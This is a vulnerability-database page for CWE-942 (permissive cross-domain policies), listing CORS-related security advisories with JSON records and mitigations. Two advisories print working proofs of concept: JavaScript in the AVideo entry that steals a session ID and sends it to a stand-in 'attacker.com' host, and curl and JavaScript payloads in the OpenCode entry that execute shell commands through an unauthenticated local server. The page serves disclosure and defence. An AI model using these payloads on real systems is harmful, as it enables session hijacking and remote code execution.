CWE-942
AllowedPermissive Cross-domain Security Policy with Untrusted Domains
Abstraction: Variant · Status: Incomplete
The product uses a web-client protection mechanism such as a Content Security Policy (CSP) or cross-domain policy file, but the policy includes untrusted domains with which the web client is allowed to communicate.
176 vulnerabilities reference this CWE, most recent first.
GHSA-PRQW-X27X-86H2
Vulnerability from github – Published: 2024-05-14 15:32 – Updated: 2024-05-14 15:32HCL DRYiCE Lucy (now AEX) is affected by a Cross Origin Resource Sharing (CORS) vulnerability. The mobile app is vulnerable to a CORS misconfiguration which could potentially allow unauthorized access to the application resources from any web domain and enable cache poisoning attacks.
{
"affected": [],
"aliases": [
"CVE-2023-37526"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-14T13:20:18Z",
"severity": "MODERATE"
},
"details": "HCL DRYiCE Lucy (now AEX) is affected by a Cross Origin Resource Sharing (CORS) vulnerability. The mobile app is vulnerable to a CORS misconfiguration which could potentially allow unauthorized access to the application resources from any web domain and enable cache poisoning attacks.\n",
"id": "GHSA-prqw-x27x-86h2",
"modified": "2024-05-14T15:32:50Z",
"published": "2024-05-14T15:32:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37526"
},
{
"type": "WEB",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0113032"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-Q2FW-2Q69-QH7P
Vulnerability from github – Published: 2025-06-06 12:30 – Updated: 2025-06-06 12:30In IDF v0.10.0-0C03-03 and ZLF v0.10.0-0C03-04, a configuration error has been detected in cross-origin resource sharing (CORS). Exploiting this vulnerability requires authenticating to the device and executing certain commands that can be executed with view permission.
{
"affected": [],
"aliases": [
"CVE-2025-41363"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-06T12:15:22Z",
"severity": "MODERATE"
},
"details": "In IDF v0.10.0-0C03-03 and ZLF v0.10.0-0C03-04, a configuration error has been detected in cross-origin resource sharing (CORS). Exploiting this vulnerability requires authenticating to the device and executing certain commands that can be executed with view permission.",
"id": "GHSA-q2fw-2q69-qh7p",
"modified": "2025-06-06T12:30:33Z",
"published": "2025-06-06T12:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41363"
},
{
"type": "WEB",
"url": "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-zivs-idf-and-zlf-products"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-QC3P-398R-P59J
Vulnerability from github – Published: 2026-03-17 19:52 – Updated: 2026-03-20 21:23Summary
/objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin() function reflects any Origin header back in Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true, enabling cross-origin session theft and full account takeover.
Details
File: objects/phpsessionid.json.php
allowOrigin();
$obj = new stdClass();
$obj->phpsessid = session_id();
echo _json_encode($obj);
No authentication is required. The allowOrigin() function in objects/functions.php (line ~2648) reflects the request Origin:
$HTTP_ORIGIN = empty($_SERVER['HTTP_ORIGIN']) ? @$_SERVER['HTTP_REFERER'] : $_SERVER['HTTP_ORIGIN'];
header("Access-Control-Allow-Origin: " . $HTTP_ORIGIN);
header("Access-Control-Allow-Credentials: true");
This means any external website can make a credentialed cross-origin request and read the session ID.
PoC
An attacker hosts the following page:
<script>
fetch('https://TARGET/objects/phpsessionid.json.php', {
credentials: 'include'
})
.then(r => r.json())
.then(d => {
// d.phpsessid = victim's session ID
document.location = 'https://attacker.com/steal?sid=' + d.phpsessid;
});
</script>
When a logged-in AVideo user visits the attacker's page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session.
Impact
Account Takeover — Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "25.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33043"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T19:52:28Z",
"nvd_published_at": "2026-03-20T06:16:12Z",
"severity": "HIGH"
},
"details": "### Summary\n\n`/objects/phpsessionid.json.php` exposes the current PHP session ID to any unauthenticated request. The `allowOrigin()` function reflects any `Origin` header back in `Access-Control-Allow-Origin` with `Access-Control-Allow-Credentials: true`, enabling cross-origin session theft and full account takeover.\n\n### Details\n\n**File:** `objects/phpsessionid.json.php`\n\n```php\nallowOrigin();\n$obj = new stdClass();\n$obj-\u003ephpsessid = session_id();\necho _json_encode($obj);\n```\n\nNo authentication is required. The `allowOrigin()` function in `objects/functions.php` (line ~2648) reflects the request Origin:\n\n```php\n$HTTP_ORIGIN = empty($_SERVER[\u0027HTTP_ORIGIN\u0027]) ? @$_SERVER[\u0027HTTP_REFERER\u0027] : $_SERVER[\u0027HTTP_ORIGIN\u0027];\nheader(\"Access-Control-Allow-Origin: \" . $HTTP_ORIGIN);\nheader(\"Access-Control-Allow-Credentials: true\");\n```\n\nThis means any external website can make a credentialed cross-origin request and read the session ID.\n\n### PoC\n\nAn attacker hosts the following page:\n\n```html\n\u003cscript\u003e\nfetch(\u0027https://TARGET/objects/phpsessionid.json.php\u0027, {\n credentials: \u0027include\u0027\n})\n.then(r =\u003e r.json())\n.then(d =\u003e {\n // d.phpsessid = victim\u0027s session ID\n document.location = \u0027https://attacker.com/steal?sid=\u0027 + d.phpsessid;\n});\n\u003c/script\u003e\n```\n\nWhen a logged-in AVideo user visits the attacker\u0027s page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session.\n\n### Impact\n\n**Account Takeover** \u2014 Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.",
"id": "GHSA-qc3p-398r-p59j",
"modified": "2026-03-20T21:23:00Z",
"published": "2026-03-17T19:52:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-qc3p-398r-p59j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33043"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/9f4f51e5df5e3343400f9d0068705f5482b6f930"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "AVideo affected by Session Hijacking via Unauthenticated Session ID Disclosure with Permissive CORS"
}
GHSA-QGRP-RJ4F-64XH
Vulnerability from github – Published: 2026-05-14 21:30 – Updated: 2026-05-15 15:30Inappropriate implementation in CORS in Google Chrome on Linux and ChromeOS prior to 148.0.7778.168 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)
{
"affected": [],
"aliases": [
"CVE-2026-8576"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-14T20:17:19Z",
"severity": "MODERATE"
},
"details": "Inappropriate implementation in CORS in Google Chrome on Linux and ChromeOS prior to 148.0.7778.168 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)",
"id": "GHSA-qgrp-rj4f-64xh",
"modified": "2026-05-15T15:30:40Z",
"published": "2026-05-14T21:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8576"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_12.html"
},
{
"type": "WEB",
"url": "https://issues.chromium.org/issues/496231853"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-QGVX-GH8H-GMQJ
Vulnerability from github – Published: 2023-11-14 12:30 – Updated: 2023-11-14 12:30A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1). When accessing the Information Server from affected products, the products use an overly permissive CORS policy. This could allow an attacker to trick a legitimate user to trigger unwanted behavior.
{
"affected": [],
"aliases": [
"CVE-2023-46098"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-14T11:15:14Z",
"severity": "HIGH"
},
"details": "A vulnerability has been identified in SIMATIC PCS neo (All versions \u003c V4.1). When accessing the Information Server from affected products, the products use an overly permissive CORS policy. This could allow an attacker to trick a legitimate user to trigger unwanted behavior.",
"id": "GHSA-qgvx-gh8h-gmqj",
"modified": "2023-11-14T12:30:27Z",
"published": "2023-11-14T12:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46098"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-456933.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-R863-5PGM-C8G4
Vulnerability from github – Published: 2026-05-29 09:31 – Updated: 2026-05-29 09:31CORS misconfiguration in the REST API of Network Optix Nx Witness VMS before version 6.1.2, when running in the default Standard security mode, on Linux and Windows allows an unauthenticated remote attacker to steal the session token of an authenticated user and perform Administrator Account Takeover via a malicious cross-origin web page visited by the victim. The High security mode is not affected.Workaround:
For existing installations running in Standard security mode, set Access-Control-Allow-Credentials to false via the REST API: PATCH /rest/v2/system/settings with body {"supportedOrigins": "null"}. Alternatively, select High security level during initial setup.
Solution:
Update to Nx Witness VMS version 6.1.2 or later, in which Access-Control-Allow-Credentials is set to false in the default Standard security configuration.
{
"affected": [],
"aliases": [
"CVE-2026-10056"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-29T09:16:17Z",
"severity": "HIGH"
},
"details": "CORS misconfiguration in the REST API of Network Optix Nx Witness VMS before version 6.1.2, when running in the default Standard security mode, on Linux and Windows allows an unauthenticated remote attacker to steal the session token of an authenticated user and perform Administrator Account Takeover via a malicious cross-origin web page visited by the victim. The High security mode is not affected.Workaround:\n\nFor existing installations running in Standard security mode, set Access-Control-Allow-Credentials to false via the REST API: PATCH /rest/v2/system/settings with body {\"supportedOrigins\": \"null\"}. Alternatively, select High security level during initial setup.\n\nSolution:\n\nUpdate to Nx Witness VMS version 6.1.2 or later, in which Access-Control-Allow-Credentials is set to false in the default Standard security configuration.",
"id": "GHSA-r863-5pgm-c8g4",
"modified": "2026-05-29T09:31:05Z",
"published": "2026-05-29T09:31:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10056"
},
{
"type": "WEB",
"url": "https://support.networkoptix.com/hc/en-us/articles/39254208939159-How-to-Enable-CORS-Validation"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RQG6-587C-H9V3
Vulnerability from github – Published: 2025-06-16 12:30 – Updated: 2025-06-16 12:30An unauthenticated remote attacker can take advantage of the current overly permissive CORS policy to gain access and read the responses, potentially exposing sensitive data or enabling further attacks.
{
"affected": [],
"aliases": [
"CVE-2025-25264"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-16T10:15:19Z",
"severity": "HIGH"
},
"details": "An unauthenticated remote attacker can take advantage of the current overly permissive CORS policy to gain access and read the responses, potentially exposing sensitive data or enabling further attacks.",
"id": "GHSA-rqg6-587c-h9v3",
"modified": "2025-06-16T12:30:25Z",
"published": "2025-06-16T12:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25264"
},
{
"type": "WEB",
"url": "https://certvde.com/en/advisories/VDE-2025-018"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V9W2-V7J9-RJPR
Vulnerability from github – Published: 2021-09-02 22:02 – Updated: 2021-09-13 20:27In Eclipse Theia 0.3.9 to 1.8.1, the "mini-browser" extension allows a user to preview HTML files in an iframe inside the IDE. But with the way it is made it is possible for a previewed HTML file to trigger an RCE. This exploit only happens if a user previews a malicious file.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@theia/mini-browser"
},
"ranges": [
{
"events": [
{
"introduced": "0.3.9"
},
{
"fixed": "1.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-34435"
],
"database_specific": {
"cwe_ids": [
"CWE-346",
"CWE-668",
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2021-09-02T17:12:13Z",
"nvd_published_at": "2021-09-01T18:15:00Z",
"severity": "HIGH"
},
"details": "In Eclipse Theia 0.3.9 to 1.8.1, the \"mini-browser\" extension allows a user to preview HTML files in an iframe inside the IDE. But with the way it is made it is possible for a previewed HTML file to trigger an RCE. This exploit only happens if a user previews a malicious file.",
"id": "GHSA-v9w2-v7j9-rjpr",
"modified": "2021-09-13T20:27:30Z",
"published": "2021-09-02T22:02:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34435"
},
{
"type": "WEB",
"url": "https://github.com/eclipse-theia/theia/pull/8759"
},
{
"type": "WEB",
"url": "https://github.com/eclipse-theia/theia/commit/0761dcf5fe3c14c27432683d42d2c526ad0cfbd5"
},
{
"type": "WEB",
"url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=568018"
},
{
"type": "PACKAGE",
"url": "https://github.com/eclipse-theia/theia"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Remote code execution in Eclipse Theia"
}
GHSA-VHQM-XJCF-G4X8
Vulnerability from github – Published: 2026-04-08 15:31 – Updated: 2026-04-08 15:31CORS misconfiguration in CoolerControl/coolercontrold <4.0.0 allows unauthenticated remote attackers to read data and send commands to the service via malicious websites
{
"affected": [],
"aliases": [
"CVE-2026-5302"
],
"database_specific": {
"cwe_ids": [
"CWE-942"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-08T13:16:43Z",
"severity": "MODERATE"
},
"details": "CORS misconfiguration in CoolerControl/coolercontrold \u003c4.0.0 allows unauthenticated remote attackers to read data and send commands to the service via malicious websites",
"id": "GHSA-vhqm-xjcf-g4x8",
"modified": "2026-04-08T15:31:44Z",
"published": "2026-04-08T15:31:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5302"
},
{
"type": "WEB",
"url": "https://gitlab.com/coolercontrol/coolercontrol/-/blob/2.0.0/coolercontrold/src/api/mod.rs?ref_type=tags#L374"
},
{
"type": "WEB",
"url": "https://gitlab.com/coolercontrol/coolercontrol/-/releases/4.0.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-VXW4-WV6M-9HHH
Vulnerability from github – Published: 2026-01-13 20:35 – Updated: 2026-01-13 20:35Previously reported via email to support@sst.dev on 2025-11-17 per the security policy in opencode-sdk-js/SECURITY.md. No response received.
Summary
OpenCode automatically starts an unauthenticated HTTP server that allows any local process—or any website via permissive CORS—to execute arbitrary shell commands with the user's privileges.
Details
When OpenCode starts, it spawns an HTTP server (default port 4096+) with no authentication. Critical endpoints exposed:
POST /session/:id/shell- Execute shell commands (server.ts:1401)POST /pty- Create interactive terminal sessions (server.ts:267)GET /file/content?path=- Read arbitrary files (server.ts:1868)
The server is started automatically in cli/cmd/tui/worker.ts:36 via Server.listen().
No authentication middleware exists in server/server.ts. The server uses permissive CORS (.use(cors()) with default Access-Control-Allow-Origin: *), enabling browser-based exploitation.
PoC
Local exploitation:
API="http://127.0.0.1:4096" # update with actual port
SESSION_ID=$(curl -s -X POST "$API/session" -H "Content-Type: application/json" -d '{}' | jq -r '.id')
curl -s -X POST "$API/session/$SESSION_ID/shell" -H "Content-Type: application/json" \
-d '{"agent": "build", "command": "echo PWNED > /tmp/pwned.txt"}'
cat /tmp/pwned.txt # outputs: PWNED
Browser-based exploitation:
A malicious website can exploit visitors who have OpenCode running. Confirmed working in Firefox. PoC available upon request.
// Malicious website JavaScript
fetch('http://127.0.0.1:4096/session', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: '{}'
})
.then(r => r.json())
.then(session => {
fetch(`http://127.0.0.1:4096/session/${session.id}/shell`, {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({agent: 'build', command: 'id > /tmp/pwned.txt'})
});
});
Note: Chrome 142+ may prompt for Local Network Access permission. Firefox does not.
Impact
Remote Code Execution via two vectors:
-
Local process: Any malicious npm package, script, or compromised application can execute commands as the user running OpenCode.
-
Browser-based (confirmed in Firefox): Any website can execute commands on visitors who have OpenCode running. This enables drive-by attacks via malicious ads, compromised websites, or phishing pages.
With --mdns flag, the server binds to 0.0.0.0 and advertises via Bonjour, extending the attack surface to the entire local network.
Code analysis, CVSS scoring, and documentation assisted by Claude AI (Opus 4.5). Vulnerability verification and PoC testing performed by the reporter.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "opencode-ai"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.216"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-22812"
],
"database_specific": {
"cwe_ids": [
"CWE-306",
"CWE-749",
"CWE-942"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-13T20:35:08Z",
"nvd_published_at": "2026-01-12T23:15:53Z",
"severity": "HIGH"
},
"details": "*Previously reported via email to support@sst.dev on 2025-11-17 per the security policy in [opencode-sdk-js/SECURITY.md](https://github.com/sst/opencode-sdk-js/blob/main/SECURITY.md). No response received.*\n\n### Summary\n\nOpenCode automatically starts an unauthenticated HTTP server that allows any local process\u2014or any website via permissive CORS\u2014to execute arbitrary shell commands with the user\u0027s privileges.\n\n### Details\n\nWhen OpenCode starts, it spawns an HTTP server (default port 4096+) with no authentication. Critical endpoints exposed:\n\n- `POST /session/:id/shell` - Execute shell commands (`server.ts:1401`)\n- `POST /pty` - Create interactive terminal sessions (`server.ts:267`)\n- `GET /file/content?path=` - Read arbitrary files (`server.ts:1868`)\n\nThe server is started automatically in `cli/cmd/tui/worker.ts:36` via `Server.listen()`.\n\nNo authentication middleware exists in `server/server.ts`. The server uses permissive CORS (`.use(cors())` with default `Access-Control-Allow-Origin: *`), enabling browser-based exploitation.\n\n### PoC\n\n**Local exploitation:**\n\n```bash\nAPI=\"http://127.0.0.1:4096\" # update with actual port\nSESSION_ID=$(curl -s -X POST \"$API/session\" -H \"Content-Type: application/json\" -d \u0027{}\u0027 | jq -r \u0027.id\u0027)\ncurl -s -X POST \"$API/session/$SESSION_ID/shell\" -H \"Content-Type: application/json\" \\\n -d \u0027{\"agent\": \"build\", \"command\": \"echo PWNED \u003e /tmp/pwned.txt\"}\u0027\ncat /tmp/pwned.txt # outputs: PWNED\n```\n\n**Browser-based exploitation:**\n\nA malicious website can exploit visitors who have OpenCode running. Confirmed working in Firefox. PoC available upon request.\n\n```javascript\n// Malicious website JavaScript\nfetch(\u0027http://127.0.0.1:4096/session\u0027, {\n method: \u0027POST\u0027,\n headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n body: \u0027{}\u0027\n})\n.then(r =\u003e r.json())\n.then(session =\u003e {\n fetch(`http://127.0.0.1:4096/session/${session.id}/shell`, {\n method: \u0027POST\u0027,\n headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n body: JSON.stringify({agent: \u0027build\u0027, command: \u0027id \u003e /tmp/pwned.txt\u0027})\n });\n});\n```\n\nNote: Chrome 142+ may prompt for Local Network Access permission. Firefox does not.\n\n### Impact\n\n**Remote Code Execution** via two vectors:\n\n1. **Local process**: Any malicious npm package, script, or compromised application can execute commands as the user running OpenCode.\n\n2. **Browser-based (confirmed in Firefox)**: Any website can execute commands on visitors who have OpenCode running. This enables drive-by attacks via malicious ads, compromised websites, or phishing pages.\n\nWith `--mdns` flag, the server binds to `0.0.0.0` and advertises via Bonjour, extending the attack surface to the entire local network.\n\n*Code analysis, CVSS scoring, and documentation assisted by Claude AI (Opus 4.5). Vulnerability verification and PoC testing performed by the reporter.*",
"id": "GHSA-vxw4-wv6m-9hhh",
"modified": "2026-01-13T20:35:08Z",
"published": "2026-01-13T20:35:08Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22812"
},
{
"type": "WEB",
"url": "https://github.com/anomalyco/opencode/commit/7d2d87fa2c44e32314015980bb4e59a9386e858c"
},
{
"type": "PACKAGE",
"url": "https://github.com/anomalyco/opencode"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "OpenCode\u0027s Unauthenticated HTTP Server Allows Arbitrary Command Execution"
}
Mitigation
Strategy: Attack Surface Reduction
Define a restrictive Content Security Policy [REF-1486] or cross-domain policy file.
Mitigation
Strategy: Attack Surface Reduction
Avoid using wildcards in the CSP / cross-domain policy file. Any domain matching the wildcard expression will be implicitly trusted, and can perform two-way interaction with the target server.
Mitigation
Strategy: Environment Hardening
For Flash, modify crossdomain.xml to use meta-policy options such as 'master-only' or 'none' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server.
No CAPEC attack patterns related to this CWE.